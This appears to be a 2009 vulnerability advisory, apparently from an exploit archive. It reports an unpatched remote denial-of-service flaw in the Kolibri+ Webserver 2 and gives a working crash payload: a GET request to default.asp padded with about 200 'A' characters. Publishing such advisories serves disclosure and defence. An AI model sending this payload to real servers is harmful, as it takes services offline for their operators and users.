Kolibri+ Webserver 2 (Get Request) Denial of Service Vulnerability

2009-09-10 16:42:46

#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################


[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol


[*] Attack type : Remote


[*] Patch Status : Unpatched



[*] Exploitation :



[+] [Denial Of Service / CRASH]

("A" x 200; #Late crash)

Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.